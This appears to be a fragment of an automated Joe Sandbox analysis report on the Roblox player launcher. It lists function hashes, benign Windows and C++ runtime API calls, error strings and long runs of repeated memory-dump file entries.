              • Opcode ID: edf23bfcde086b1dc660e8d8a63e8ef401bf203d5c116f4541a60368f5a62fc6
              • Instruction ID: ea55dd403f0e28749b61e0e5e4d6597c6ac9693dfd8df5a6b3bc86a6bcfebe58
              • Opcode Fuzzy Hash: edf23bfcde086b1dc660e8d8a63e8ef401bf203d5c116f4541a60368f5a62fc6
              • Instruction Fuzzy Hash: 4781C1B1D00619DBCB25DF58D985BEEBBB8FF44714F104259E908A7381E734AE84CB91
              APIs
              • _ValidateLocalCookies.LIBCMT ref: 009F8B67
              • ___except_validate_context_record.LIBVCRUNTIME ref: 009F8B6F
              • _ValidateLocalCookies.LIBCMT ref: 009F8BF8
              • __IsNonwritableInCurrentImage.LIBCMT ref: 009F8C23
              • _ValidateLocalCookies.LIBCMT ref: 009F8C78
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
              • String ID: csm
              • API String ID: 1170836740-1018135373
              • Opcode ID: 2c12122cf559e0f459a15a94cbb755a2920fceb8155cd622c3fbfd75b53af4f2
              • Instruction ID: efaa541aab38a7c66667072498aab87d024001c8f2159e70eceae843f27a7984
              • Opcode Fuzzy Hash: 2c12122cf559e0f459a15a94cbb755a2920fceb8155cd622c3fbfd75b53af4f2
              • Instruction Fuzzy Hash: 4041E434A0020DAFCF10DF68C895ABFBBB9EF45314F1480A5EA159B392DB31E951CB91
              APIs
              • GetLastError.KERNEL32 ref: 0073C38B
              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,?), ref: 0073C3D2
              • LocalAlloc.KERNEL32(00000000,00000040), ref: 0073C423
              • LocalFree.KERNEL32(?,-00000002,?,?,?,?,?), ref: 0073C4CD
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Local$AllocErrorFormatFreeLastMessage
              • String ID: IDispatch error #%d$Unknown error 0x%0lX
              • API String ID: 154589956-2934499512
              • Opcode ID: 9df955af1e7b590c49b4238e6520e0bcae5f8cb6d0b2a4775bb737adec151e9f
              • Instruction ID: 39c6d5b3f7056a871ff1997ff1255771aa52bf9b41c596834feaa73ca08e7219
              • Opcode Fuzzy Hash: 9df955af1e7b590c49b4238e6520e0bcae5f8cb6d0b2a4775bb737adec151e9f
              • Instruction Fuzzy Hash: EF41E6B8A003419BEB14DF58CC19BBEB7B5FF84B04F10855DE911B7291D7B96901CB90
              APIs
              • SHGetKnownFolderPath.SHELL32(?,?,00000000,?), ref: 007379EF
              • PathAddBackslashW.SHLWAPI(?,?,?), ref: 00737C99
                • Part of subcall function 0071E0F0: GetLastError.KERNEL32(0073CD66,00B314CC,0073CD66,?,0073CD66,80004005), ref: 0071E110
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Path$BackslashErrorFolderKnownLast
              • String ID: Bad result from SHGetKnownFolderPath=%x$\Roblox\$argument not found
              • API String ID: 3856291722-2833684437
              • Opcode ID: f6d6ade2c7287b1fd2bd1124aee26e046b16703de12c9566a1a475cbabfd2967
              • Instruction ID: c282eba123d1c5deb5f6178c3bd2b1646ec75a4d097bc8bc943017d022403203
              • Opcode Fuzzy Hash: f6d6ade2c7287b1fd2bd1124aee26e046b16703de12c9566a1a475cbabfd2967
              • Instruction Fuzzy Hash: ABE109B1D04249DBEB28DFA8CD45BEEF7B5FF44300F148119E845A7292DB38AA44CB60
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: File$DeleteErrorLastMove
              • String ID: %s.%d.TMP$ios_base::badbit set
              • API String ID: 3195829115-345462464
              • Opcode ID: 661a4526b1dec68fa47831b1ab8036c28736506a474ddfd4c24620d49ec9781a
              • Instruction ID: 67b3f7028a948aa181b01b10a6e655ac3d21d15a38ac13e52ca98f0fb5aaa23b
              • Opcode Fuzzy Hash: 661a4526b1dec68fa47831b1ab8036c28736506a474ddfd4c24620d49ec9781a
              • Instruction Fuzzy Hash: 42D1F631E002499FEF24CF68DC457EEBBB6FF45304F108219E415A7292E779A944CB91
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00715AF9
              • std::_Lockit::_Lockit.LIBCPMT ref: 00715B1B
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00715B3B
              • __Getctype.LIBCPMT ref: 00715BE2
              • std::_Facet_Register.LIBCPMT ref: 00715C0B
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00715C23
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
              • String ID:
              • API String ID: 1102183713-0
              • Opcode ID: 9946f53a8340a2706f475cbe8cde418cf782f1fd86b8030a2f20e5382f7bd56f
              • Instruction ID: b7fbf501dc82b20d6edeb423dbcb5209f3a2546a11cf2c322a24e54c9023d222
              • Opcode Fuzzy Hash: 9946f53a8340a2706f475cbe8cde418cf782f1fd86b8030a2f20e5382f7bd56f
              • Instruction Fuzzy Hash: 7941AFB1904655CBCB2ACF58C485BEEBBB4FF84710F148159E805AB381DB78AD81CBD1
              APIs
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C37
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C55
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741C75
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741D44
              • std::ios_base::failure::failure.LIBCPMT ref: 00743FD1
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Lockitstd::_$Lockit::_Lockit::~_$std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 3570791469-1866435925
              • Opcode ID: 1dbae672788842f65a1c5640c007fe7f348a54b1787eb9a35d71e06908d3aa2c
              • Instruction ID: 855186dca2f19867722eb8fbcf726e55afa3bf991d56fe297a66fcd563f97e61
              • Opcode Fuzzy Hash: 1dbae672788842f65a1c5640c007fe7f348a54b1787eb9a35d71e06908d3aa2c
              • Instruction Fuzzy Hash: 3AB17F74A00248DFDB04DF98C985BAEBBF5EF98304F248099E909AB352D736DD01CB91
              APIs
              • GetLastError.KERNEL32 ref: 0073ED5B
              • CopyFileW.KERNEL32(?,?,00000000), ref: 0073EE0B
              • MoveFileW.KERNEL32(?,?), ref: 0073EF79
                • Part of subcall function 008BC620: GetCurrentThreadId.KERNEL32 ref: 008BC760
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: File$CopyCurrentErrorLastMoveThread
              • String ID: %s: %S$:Zone.Identifier:$DATA
              • API String ID: 794519006-325868283
              • Opcode ID: b4e794fd6d022bf337ea487d0c24a3b05121c36d7d5767445c804c8f42cfce0b
              • Instruction ID: e365d2ab4aea13766cc72ce9601284952340f86657a806b1d3aace6db5eb76ca
              • Opcode Fuzzy Hash: b4e794fd6d022bf337ea487d0c24a3b05121c36d7d5767445c804c8f42cfce0b
              • Instruction Fuzzy Hash: F5911471D00149AFEB14EFA8DD49BEE7BB6FB85344F140128E804A7393E7799944C7A2
              APIs
              • CloseHandle.KERNEL32(00000000,0CCCCCCC), ref: 008A9352
              • GetLastError.KERNEL32(Check failed: CloseHandle(handle),00A96D88,CloseHandle), ref: 008A936B
                • Part of subcall function 00740900: std::ios_base::failure::failure.LIBCPMT ref: 00740B6F
              Strings
              • Check failed: CloseHandle(handle), xrefs: 008A9366
              • ../../../util/win/scoped_handle.cc, xrefs: 008A9375
              • void __cdecl crashpad::internal::ScopedKernelHANDLECloseTraits::Free(void *), xrefs: 008A937A
              • CloseHandle, xrefs: 008A935C
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CloseErrorHandleLaststd::ios_base::failure::failure
              • String ID: ../../../util/win/scoped_handle.cc$Check failed: CloseHandle(handle)$CloseHandle$void __cdecl crashpad::internal::ScopedKernelHANDLECloseTraits::Free(void *)
              • API String ID: 2658808353-787523245
              • Opcode ID: bf547f1718dd9f5f46217c5a22ae40f39322db536bc0c1f4589ad9181bb8ff5a
              • Instruction ID: 5470446eabece95369d3cb8cbc4badf093e3ed460192054989add914cb41177c
              • Opcode Fuzzy Hash: bf547f1718dd9f5f46217c5a22ae40f39322db536bc0c1f4589ad9181bb8ff5a
              • Instruction Fuzzy Hash: C7F0BBB5B84308B6EB1077A4AD47F693518BB11745F400564FF04A61C3EB765A154191
              APIs
              • std::locale::_Init.LIBCPMT ref: 00719CE0
              • std::ios_base::failure::failure.LIBCPMT ref: 00719E62
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Initstd::ios_base::failure::failurestd::locale::_
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2160282220-1866435925
              • Opcode ID: 4f8d9aba93f9f85642ed42e0d2da241363ed0ec5ce86e9e9b9e0fb91594183f7
              • Instruction ID: a53ff4d331a9c5cb9e6b6728c6a55383ef7d5d87eebbab3045f4b22061cee428
              • Opcode Fuzzy Hash: 4f8d9aba93f9f85642ed42e0d2da241363ed0ec5ce86e9e9b9e0fb91594183f7
              • Instruction Fuzzy Hash: 58717AB4A00215CFDB10CF58C995B9ABBF4FF48300F148469E909AB386D7B9D945CFA1
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 008BF6F4
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
